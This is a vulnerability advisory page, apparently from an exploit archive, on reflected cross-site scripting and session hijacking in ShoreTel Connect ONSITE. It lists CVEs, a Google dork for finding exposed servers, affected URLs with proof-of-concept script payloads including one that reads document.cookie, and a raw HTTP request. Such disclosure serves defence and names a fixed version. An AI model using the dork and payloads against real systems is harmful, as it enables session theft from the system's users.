ShoreTel Connect ONSITE Cross Site Scripting / Session Fixation

Credit: Ramikan
Risk: Medium
Local: No
Remote: Yes

CVSS Base Score: 4.3/10
Impact Subscore: 2.9/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: None
Integrity impact: Partial
Availability impact: None

# Exploit Title: Shoretel Connect Multiple Vulnerability # Google Dork: inurl:/signin.php?ret= # Date: 14/06/2017 # Author: Ramikan # Vendor Homepage: # Software Link: # Version: Tested on 18.62.2000.0, 19.45.5101.0, 19.47.9000.0, 19.48.8400.0 can be affected on other versions. # Tested on: Mozila Firefox 53.0.3 (32 bit) Browser # CVE :CVE-2019-9591, CVE-2019-9592, CVE-2019-9593 # Category:Web Apps Vulnerability: Reflected XSS and Session Fixation Vendor Web site: Version tested:18.62.2000.0, Version 19.45.1602.0, 19.45.5101.0, 19.47.9000.0, 19.48.8400.0 Google dork: inurl:/signin.php?ret= Solution: Update to 19.49.1500.0 Vulnerability 1:Refelected XSS & Form Action Hijacking Affected URL: /signin.php?><script>alert(1)</script>y0gpy&page=ACCOUNT Affected Parameter: brandUrl Vulnerability 2: Reflected XSS Affected URL: /index.php/" onmouseover%3dalert(document.cookie) style%3dposition%3aabsolute%3bwidth%3a100%25%3bheight%3a100%25%3btop%3a0%3bleft%3a0%3b Affected Parameter: url Affected Version 19.45.1602.0 Vulnerability 3: Reflected XSS /site/?page=jtqv8"><script>alert(1)</script>bi14e Affected Parameter: page Affected Version:18.82.2000.0 GET /site/?page=jtqv8"><script>alert(1)</script>bi14e HTTP/1.1 Host: hostnamem User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip, deflate Referer: Cookie: PHPSESSID=2229e3450f16fcfb2531e2b9d01b9fec; chkcookie=1508247199505 Connection: close Upgrade-Insecure-Requests: 1 Cache-Control: max-age=0 Vulnerability 4: Session Hijacking By exploiting the above XSS vulnerability, the attacker can obtain the valid session cookies of a authenticated user and hijack the session. PHPSESSID, chkcookie both cookies are insecure.

Vote for this issue:


Thanks for you vote!


Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2021,


Back to Top